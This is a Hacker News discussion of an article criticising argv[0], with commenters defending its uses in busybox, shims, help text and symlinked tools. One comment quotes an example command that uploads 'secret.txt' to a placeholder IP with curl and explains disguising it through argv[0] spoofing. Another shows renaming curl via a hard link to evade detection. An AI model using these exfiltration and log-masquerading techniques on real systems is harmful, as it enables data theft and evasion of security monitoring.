Hacker News

Why bother with argv[0]?

by wietzeon 9/3/2024, 12:30:06 PM with 56 comments

by yjftsjthsd-hon 9/3/2024, 2:50:41 PM
So obviously claiming that there's no good reason for process to read argv[0] is either demonstrating the author's ignorance or needs a much stronger defense; I'd be fascinated to hear how they think busybox should work on an OpenWrt box with a 16MB root filesystem.
However, I am willing to consider the discussion about whether there could be merit to restricting the ability to write that value; I could imagine a system that populated it only from the actual file name and did not allow it to be written by the parent process or the child process at runtime. The obvious place this still falls apart is that an attacker could just
```
    ln /bin/curl ./some\ other\ name
```
but there are sometimes security measures that we use even though they're less than 100% effective so it at least conceivable that this might be a trade off worth making.
by avidiaxon 9/3/2024, 1:51:53 PM
It is sometimes used to allow one binary to be the symlink target of hundreds of commands.
Android does this for most common shell commands. Toybox and busybox are examples of such implementations.
https://github.com/landley/toybox
https://en.m.wikipedia.org/wiki/BusyBox
by travisgriggson 9/3/2024, 2:38:13 PM
> “Should a program be allowed to behave differently based on its name?”
I don’t see why not. It’s allowed to behave differently based on the arguments that follow it. I personally think the genericity of including the program name itself as one of its own calling arguments is really meta cool.
by theamkon 9/3/2024, 2:43:03 PM
That's a weird take against argv[0] - all arguments are: "goes against modern design principles" and "can confuse programs which use argv[0] when they wanted "exec" instead"
For the former, I don't see how this goes against modern principles - in presence of symlinks, it is pretty reasonable to want to know both "how was this program called", as well as "what's the actual executable we ended up with". And this does more than just giving multiple names to same program - for example python uses argv[0] to tell if it's inside virtualenv and adjust search paths accordingly. This makes it appear like there are multiple python installs on system, with no extra disk space taken.
For the latter, yes, programs can have bugs and OSes can have non-obvious semantics, and if you are security software, it's very important to be aware about them. I would not mark "argv[0]" as something especially bad from security perspective. All the author's examples would still be possible in hypothetical world where argv[0] is set by system - as nothing stops user from creating a symlink in temporary dir with deceiving name (spaces and quotes are OK in filenames!) and exec'ing it directly. Instead, fix your security software so it quotes argv values?
by jrockwayon 9/3/2024, 4:59:59 PM
I think argv[0] is fine. It sounds like there is a lot of bad security scanning software that doesn't understand how the `exec` syscall works. That sounds like their problem and not a fundamental problem with argv[0].
Most people use argv[0] so they can do something like:
```
   $ mycommand help
   Type `mycommand foo bar` to foo bars.

   $ mycommand1.2.3 help
   Type `mycommand1.2.3 foo bar` to foo bars.
```
This is admittedly less fun when mycommand is /home/jrockway/.cache/bazel/_bazel_jrockway/7f95bd5e6dcc2e75a861133ddc7aee82/execroot/_main/bazel-out/k8-fastbuild/mycommand/mycommand_/mycommand` however.
by kelsey98765431on 9/3/2024, 1:52:59 PM
This is how busybox works in 'shim' mode. I am not however concerned with the security argument here, if you have the ability to run code you have the ability to do n to the power of x insidious things, and arg[0] abuse is just one of dozens, (hundreds?) of vectors or useful building blocks in an attack. if we are suddenly giving a shit about security on nixens, we should be looking at deeper SELinux rollouts (ease of use for sysadmins and maintainers so we never see permissive mode instead of just applying the difficult to remember command that will patch your policy settings. We need root capabilities to continue to be separated in the kernel access control scheme and probably we need to start using namespaces much more liberally like projects like silverblue/bluefin which reimplement entire os stack as a series of containers. Stronger container foundations and ease of use for existing security mechanisms will take us much further than worrying about ANYTHING else in the ABI which by the way will never change as long as linus is alive, and he will live on forever as an LLM most likely with the amount of mailing list posts he has made over the years.
by js2on 9/3/2024, 3:29:59 PM
> Today however, disk space is no longer considered an issue; this is evidenced by macOS Sonoma, where shutdown and reboot are two separate executables.
Try running `ls -li /usr/bin` on macOS and you might be surprised to learn that all of these are a single executable: DeRez, GetFileInfo, Rez, SetFile, SplitForks, ar, as, asa, ... yacc. There's 77 different entries in `/usr/bin` (including `git` and `python3`) that are all links to the same binary (`com.apple.dt.xcode_select.tool-shim`). It's a wrapper that implements the `xcode-select` concept to locate and run the real executable provided by either the Command Line Tools package or a particular Xcode version you may have installed.
And that's not the only one. There's another 68 links starting with `binhex.pl` and ending with `zipdetails` that are a single 811 byte wrapper-script around perl.
Altogether, I see that there are 26 different names that are multiply linked:
```
  ls -li /usr/bin |
  awk '{print $1}' | 
  sort | uniq -c | 
  sort -n | grep -v "\s*1\s" | wc -l
```
Some of the other examples: less & more, bc & dc, atrm & batch, stat & readlink.
Having a program behave dynamically based on argv[0] is a useful tool in the Unix toolbox. The alternative would be compiling 77 different versions of `tool-shim,` creating 68 different versions of that perl wrapper, etc.
The `git` binary uses this concept too. You can create an executable named `git-foo`, put it anywhere in your PATH, and then call it as `git foo`.
In the end, argv[0] is just an argument that can be used to improve CLI ergonomics and reduce code duplication. It's not solely about disk space. I think that makes it a more common and useful concept than you give it credit for.
As to the rest of the post: I'm not really sure how argv[0] being in the caller's control is any different than the rest of the execution context being in the caller's control: the remaining arguments, the environment, limits on file descriptors, which file descriptors are open, the program's real and effective uid and gid, signals it might receive and so on. These all amount to untrusted input any executable has to be cognizant of, more or less so depending upon what privileges the executable has and what its goals are.
by dcminteron 9/3/2024, 2:10:46 PM
This lost me at "goes against modern design principles" without citing what principle(s) the author had in mind that would proscribe it.
by lanstinon 9/3/2024, 2:24:28 PM
This article seems to be an example of how some common security practices are kind of surface level. If you want to limit what a box can access on the network, do it in the network. Why is security looking for bad urls in the argv; if you know they are bad just block them? Or better yet if they aren't good, don't allow them. And if you want to know what a process is doing, ask the kernel to log its syscalls. If you take away argv 0 you will lose some valuable stuff (cute little busybox links, error logs that have argv[0] in them, and attackers will just name payload.exe ls.exe. And if your network is allow all, they will still reach CNC or collector end point.
by skobeson 9/3/2024, 2:12:41 PM
"Windows’ own API calls for creating new processes (such as CreateProcess [6], ShellExecute [7]) do not allow you to set argv[0]: it sets it for you, based on how the path to the executable was provided."
Isn't this contradicted by the docs? CreateProcess receives lpApplicationName and lpCommandLine, and they can be different.
by halaylion 9/3/2024, 6:26:36 PM
> This seems like a questionable design decision. Should a program be allowed to behave differently based on its name? From a 2020s standpoint, this seems highly undesirable, as it makes software less predictable and goes against modern design principles.
No it doesn't make software less predictable nor does it goes against modern design principles. argv has very handy use cases and can be used to provide better user experience.
Unless you have evidence to back up your claims, you're just turning a subjective opinion to an objective one without any merit.
Either way, it's software developer choice and irrelevant to the user as much as it is irrelevant to the user whether the developer prefers for(;;) over while(1).
by JohnFenon 9/3/2024, 2:02:41 PM
> Today however, disk space is no longer considered an issue
On desktop machines, perhaps, but this is certainly not true on all platforms Linux runs on.
by blenderobon 9/3/2024, 2:59:50 PM
> argv[0] is a relic of the past
Busybox says hello.
Seriously though, how is this on the front page? Both the premise and conclusions contradict the reality of how argv[0] is used with symbolic links and hard links.
by josefxon 9/3/2024, 1:56:53 PM
Microsoft defender using broken by design detection rules? One could almost think it is an anti virus program.
by dotancohenon 9/3/2024, 2:09:39 PM
I also use argv[0] for the -h help text, to show examples how to use the command.
by kelnoson 9/4/2024, 2:06:37 AM
> From a 2020s standpoint, this seems highly undesirable, as it makes software less predictable and goes against modern design principles.
Says who? I'm not aware of any modern design principles that say anything about this sort of thing.
> argv[0] is ignored (mostly)
Pretty much any program I've written that has a --help option uses argv[0] to print out the usage string, i.e.:
```
    printf("%s [--some-arg] FILENAME\n", argv[0]);
```
> First off, argv[0] can be used to fool security software
Then that security software is poorly written. On Linux, the correct way to find the binary of a running process is by calling readlink(2) on /proc/$PID/exe. Assuming security software like this is going to have a lot of OS-specific code, it seems fine to me to expect they use it (and then have to do other things on other OSes).
> Another argument against this design is that if you have two programs that are so similar that it pays off to consolidate them into a single file, is there really a need for two separate programs/program names?
The author is talking about shutdown and restart being symlinks to systemctl on systemd-based systems. But what about something like busybox? busybox contains hundreds of programs, all conveniently in a single, statically-linked binary. On my system it's about 800kB. While I agree that even 250MB is not a big deal for most systems these days, it certainly is a problem for, say, a WiFi router that only has 8MB of flash.
> Ultimately, nobody wants to be bothered by argv[0].
False. I find it useful, and am not "bothered" by it at all. And I suspect security folks aren't really bothered either: the ones that actually know what they're doing look at /proc/$PID/exe when they want to find the binary backing a PID.
This article is kinda lame, and it seems like the author's objections are mostly based on ignorance.
by remramon 9/3/2024, 8:04:18 PM
> From a 2020s standpoint, this seems highly undesirable, as it makes software less predictable and goes against modern design principles.
This is not an argument at all, this is a statement that arguments exist. What are they?
It's like saying we shouldn't do something because it's "against best practices". I'm asking why are other practices preferred...
by andrewmcwatterson 9/3/2024, 2:07:27 PM
I wish amateurs would stop propagating the false idea that disk space and memory are cheap and not a problem.
by layer8on 9/3/2024, 3:35:32 PM
If nothing else, argv[0] is useful for producing error messages that indicate the name of the executable that is outputting the message.
It's probably a good idea to not have it settable to other values by the invoking process, as is generally the case on Windows (ignoring its Posix subsystem here).
by CamJNon 9/3/2024, 3:56:48 PM
This is near and dear to my heart. I wanted to make a utility to get the arguments of other processes, and found after looking that every single use of the KERN_PROCARGS2 sysctl (used on macOS) on the internet is wrong (they assume argv[0] is not an empty string), including Apple's and Google's. So after making my utility I also made a library out of it, both are bsd-3, but non-gratis: https://getargv.narzt.cam/
by cryptonectoron 9/3/2024, 3:49:57 PM
Please no. If you want to know what a process is running, look carefully in `/proc` or use `lsof` or whatever, but no, please, `argv[0]` is super useful. I use it, lots of people use it. And it's well known that pstrings can be abused to hide things from `ps`, but so what, it's been that way for 4+ decades and it's a well-known "problem" (it's not a problem).
by sphon 9/4/2024, 1:22:47 PM
What a silly post. I use argv[0] in my host-spawn tool (https://github.com/1player/host-spawn) so one can symlink it to a name inside a container and when you run it, it's executed on the host.
```
    # Inside your container:

    $ flatpak --version
    zsh: command not found: flatpak

    # Have host-spawn handle any flatpak command
    $ ln -s /usr/local/bin/host-spawn /usr/local/bin/flatpak

    # Now flatpak will always be executed on the host
    $ flatpak --version
    Flatpak 1.12.7
```
I am able to tell the symlink name by reading argv[0] to know which command to run. It is such a powerful and neat UNIX trick that has no simple alternative (in this example one would have to write ad-hoc shell scripts for each command they want to run)
by tqwhiteon 9/3/2024, 3:53:03 PM
argv[0] is a parameter. Like any user input, it should be treated skeptically. There is absolutely nothing wrong with allowing more than one way to invoke the same program. This article is simply silly. Fortunately, it will be ignored completely since acting on it would break the universe.
by jujube3on 9/3/2024, 5:06:07 PM
Problem: virus scanning software on Windows is broken.
Solution: we should not use argv[0]?
by hi-v-rocknrollon 9/3/2024, 4:20:49 PM
Arguing against legacy quirks is arguing against compatibility and arguing for throwing away decades of code portability guarantees through 20/20 hindsight perfectionism failing to consider the costs and burdens of reimagining the world with bikeshedding rants.
by kazinatoron 9/3/2024, 7:46:05 PM
The author doesn't seem to understand that argv[0] can be different due to, for instance, one executable implementing many programs, such as BusyBox and similar projects.
While argv[0] is old, if you had to design it from scratch to day, it would still be a good idea to have the program invocation name as an argument.
The idea that anything old must is historic quirk that we can today eliminate is flawed.
Now argv[0] should not be relied upon for obtaining the executable name, except as a last resort if the program is built for platforms that don't have anything else. But if one executable has multiple program names via symlinks, only argv[0] will distinguish them.
by Brian_K_Whiteon 9/3/2024, 7:50:52 PM
This is stupid. argv0 is just some data like any other data.
It's ridiculously useful aside from the obvious busybox style usage.
It's huge to be able to have a pointer to the directory where the executable resides, so you can package other assets along side it and have it all work for free without a seperate configuration file or env variables etc.
Or for debugging or even non-error logging. You might call a binary from more than one place by other means than symlinks or hard links. You might be running from different mounted filsystems, chroot or container environments etc. A symlink might be in the middle of the path and not the executable name itself. Similarly a mount point.
It's just a random small useful tool like all others. Calling it some kind of security problem is like saying that screwdrivers are a security problem because aside from turning screws, some people can use screwdrivers to stab people, and we have nut drivers which can almost serve almost all the same needs for only a little extra work.
If your context of the moment means you have a security concern where you shouldn't trust this bit of data as gospel for some reason, then don't. Treat it like user input and take whatever precautions and fallback measures and sanity checks make sense for you in whatever particular situation you are in.
F-ing dumb.
by PaulHouleon 9/3/2024, 4:48:35 PM
It’s part of the shambolic world of Unix and C. But “worse is better!”
A good language spec is laid out in a way that reads from front to back with minimized circularity. See Common Lisp, Java, Python, etc.
As a kid in high school checking out Unix manuals and implementing many Unix tools in
https://subethasoftware.com/2022/09/27/exploring-1984-os-9-o...
I struggled with K&R because of the circularity of the book, which was really an anomaly built into C, the culture of C, or both because C++ books still read this way. C had so many half-baked things, such as an otherwise clean parser that required access to the symbol table. And of course a general fast and looseness which lead to the buffer overflow problem.
There were other languages which failed to solve the systems programming problem like PL/I and Ada, not to mention ISO Pascal which could have tried but didn’t. (Turbo Pascal proved it could have been done.)
People took until 1990 or so to be able to write good language specs consistently, so we can forgive Unix but boy is it awful if you look closely at it. On the other hand, IBM never did make a universal OS for the “universal” 360, yet Unix proved to be adaptable for almost everything.
by linsomniacon 9/3/2024, 9:55:21 PM
"Security" software that trusts /proc/cmdline (and the like), and in particular if it doesn't complain about /proc/cmdline having a mismatch with /proc/exe, doesn't seem like very useful security software to me. Particularly if it's security software that is making some security decisions based on argv[0].
Seems like this security software is broken, not argv[0]
by keepamovinon 9/3/2024, 2:05:38 PM
This is why we can't have nice things. Security footguns everywhere!
I'm fascinated by the intersection of argv[0], and the execve behavior of replacing the calling program with the called one.
Aside from that, I quite like argv[0], for a much more limited set of reasons than considered in this interesting and comprehensive article. I like the ability to "retitle" a process to put a useful, descriptive, or branded name in there to be seen by ps, et al.
NodeJS also exposes this feature, but not quite as you might expect. Whereas in C, setting argv[0] from within the program's execution context will alter what is observed by ps, in NodeJS process.argv is just a descriptive getter. Setting its slots has no effect outside of its context.
But this is where process.title steps in. Setting process.title allows you to (in an OS-dependent way) change the name reported in ps and similar tools.
Read more here: https://nodejs.org/api/process.html#processtitle
Please don't kill argv[0], its lease hath all too short a date
by Dwediton 9/3/2024, 3:59:58 PM
How about the part about knowing what the directory the executable was launched from? It could be different than the working directory.
by thayneon 9/4/2024, 4:07:28 PM
> and (especially a few decades ago) can offer cross-platform/backwards syntax compatibility using a shared code base.
This is still very much an issue. For the shutdown and reboot case, the main reason those symlinks is exist is for backwards compatibility for existing programs and scripts (and muscle memory) that assume there is a shutdown or reboot command, and compatibility with systems that don't use systemd.
Another way to do that could be to use a shell script that execs systemctl, but that requires a separate intermediate shell process, which may have its own compatibility issues.
Another use of argv[0] that isn't discussed at all is putting a hyphen at the beginning of argv[0] for login shells. For example if bash is invoked as the login shell argv[0] is "-bash". That probably wasn't a great design decision, but changing it now would probably cause a lot of breakage.
by Arch-TKon 9/3/2024, 3:25:52 PM
For a command line utility, argv[0] is nice to see in error messages (e.g. `./tool: fatal: Could not open './file' for reading`). When the shell combines stdout and stderr, it's easier to spot exactly what you just typed as argv[0] from all the other output.
For most other things, definitely unnecessary.
by johnisgoodon 9/4/2024, 12:24:02 PM
So wait, I should not use `argv` in C's main() or what?
Is it only speaking against `argv[0]` or `argv` in general?
What is this proposed solution if any?
What about `__progname`? The only issue here is that if `argv[0]` is a path, then `__progname` is only the filename. What if I want the path?
by gwbas1con 9/3/2024, 5:44:40 PM
The author's extensive criticisms of using argv[0] are a distraction from the main point of the article:
Summary: By manipulating argv[0], a malicious program can hide what its doing in security logs. For example, a malicious program can make "curl -T secret.txt 123.45.67.89" look like "curl localhost | grep -T secret.txt 123.45.67.89" in security logs. A mallicious program can also use very large argv[0] values as a DOS attack on system logging; or to truncate malicious arguments.
IMO, operating systems should block this practice.
Unfortunately, the author's extensive criticism of programs reading argv[0] hurt the author's credibility before most people get to the real point of the article.
by tantaloron 9/3/2024, 2:29:57 PM
The name of something is not an intrinsic property.
by guappaon 9/3/2024, 1:49:29 PM
Wait until he finds out about busybox!
Also claiming that the windows API to call a new process is good… wow… I guess he's never had to pass a filename with quotes and spaces in its name. The API expects you to do the escaping yourself. Yes it needs to be escaped, because it's all one single string.
by t43562on 9/3/2024, 3:34:43 PM
arg0 also contains the path from where the invoker invoked the binary so for me this enables all sorts of binaries that work out where their dependencies are relative to their original binary. That's extremely convenient because you can combine it with $PWD to find out the absolute path to the binary.
One can then guess what the PYTHONPATH and LD_LIBRARY_PATH should be most of the time and save someone from having to set them.
Obviously this is of most use when you're running something you've installed into /opt (e.g. /opt/myprog/bin, /opt/myprog/lib etc) or are running it from the source tree.
by JoyfulPandaon 9/4/2024, 12:57:25 PM
Holy moly, the article addresses argv[0] as the problem, while the real problem is that the snake oil industry has no clue what they are doing
by suprjamion 9/4/2024, 1:09:10 AM
It's not often a self-promotion blog post has the entirety of HN telling you you're wrong. Better luck next time lol
by anacrolixon 9/4/2024, 2:49:45 AM
I think the Unix philosophy wins here. It might not be a clean interface but let the implementations decide what to do with it. If you remove it you are more likely to cause issues and have to grow new interfaces elsewhere.
by azlevon 9/3/2024, 3:29:25 PM
I don't think the argv was made with security in mind.
If we want something to be used in security field, the design since day 0 should consider it. Trying to retrofit something will break a lot of things.
by nmzon 9/6/2024, 2:22:31 PM
Really strange that argv[0] has a basically unlimited character size while #! has a hardcodede 256 byte limit.
by mannyvon 9/3/2024, 2:19:16 PM
"Remember, the safest computer is one that's turned off and unplugged."
by omphaloskepticon 9/3/2024, 2:41:06 PM
Also, on POSIX systems, exec-ing a program with argv[0] starting with ‘-‘ will have it start as a login shell, which is a whole rabbit hole of its own. I’m sure it’s within the security model (and the linked article doesn’t really discuss the concept of OS security models), but it’s still a pretty big shift in behaviour just from adding a character to the argv[0] value
by account42on 9/5/2024, 9:35:20 AM
> This seems like a questionable design decision.
Nope.
> Should a program be allowed to behave differently based on its name?
Yes. The program can also inspect any other part of its environment, including the parent process. What makes sense to inspect here depends on the particular program in question. The symlink example is still useful today.
> From a 2020s standpoint, this seems highly undesirable
Nope.
> it makes software less predictable
It doesn't. It makes it more predictable if programs can easily provide compatibility interfaces. Yes, you could do the same with a wrapper but removing friction matters.
> and goes against modern design principles.
Then modern design priciples can take a hike.
> Today however, disk space is no longer considered an issue
It should be considered an issue though. I buy better hardware to get more use out of it, not for lazy developers to needlessly piss it all away.
This is just yet nother example of "securit" people trying to make their lifes easier by making other's lifes harder. And as usual it's only theater since almost all of the "exploits" apply to arguments as well which for many programs provide plenty opportunity to include arbitrary strings. Fix your tools instead of expecting the world to work around their limitations.
by hinkleyon 9/3/2024, 3:19:02 PM
> Today however, disk space is no longer considered an issue;
Tell me you don’t use Docker without telling me you don’t use Docker.
I’d argue the certutil problem the author mentions is a flaw in certutil, not argv’s fault. Doesn’t that mean it falls to symlinks as well?
If you look at sudo, it’s generally deny by default. Rename a program all you want, you won’t get to use it unless you can overwrite a program that is in the sudoer file. So I don’t know what nonsense certutil is playing at if it’s using argv to do its job. That’s appalling.
by KingOfCoderson 9/3/2024, 2:48:55 PM
I use argv[0] to monitor the binary by itself and restart when it has changed.
by nottorpon 9/3/2024, 8:19:11 PM
<Cough> Busybox.
There is life outside the enterprise security theater.
by gorjusborgon 9/3/2024, 4:07:36 PM
Why bother asking?
by port19on 9/4/2024, 7:07:08 AM
L Take
by mzson 9/3/2024, 6:48:27 PM
"A login shell is one whose first character of argument zero is a -"